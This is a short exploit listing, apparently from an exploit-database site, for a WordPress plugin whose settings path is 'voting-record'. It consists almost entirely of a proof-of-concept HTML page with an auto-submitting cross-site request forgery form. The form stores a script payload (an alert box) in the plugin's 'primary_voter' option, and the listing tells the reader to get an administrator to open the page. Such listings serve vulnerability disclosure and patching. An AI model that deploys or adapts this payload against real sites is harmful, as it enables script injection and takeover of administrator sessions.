Share
## https://sploitus.com/exploit?id=WPEX-ID:BA77704A-32A1-494B-B2C0-E1C2A3F98ADC
Have an admin open an HTML page containing the following:
```
<form action="https://example.com/wp-admin/options-general.php?page=voting-record%2Fvoting-record.php" method="POST">
<input type="text" name="primary_voter" value='"><script>alert(1)</script>'>
<input type="text" name="limit" value="">
<input type="text" name="type" value="votes">
<input type="text" name="extension" value="">
<input type="text" name="open_recent" value="">
<input type="text" name="close_recent" value="">
<input type="text" name="recent_template" value="">
<input type="text" name="no_recent" value="">
<input type="text" name="open_search" value="">
<input type="text" name="close_search" value="">
<input type="text" name="search_template" value="">
<input type="text" name="no_search" value="">
<input type="text" name="update_options" value="Update">
</form>
<script>
document.forms[0].submit();
</script>
```
You will see the pop-up showing the XSS.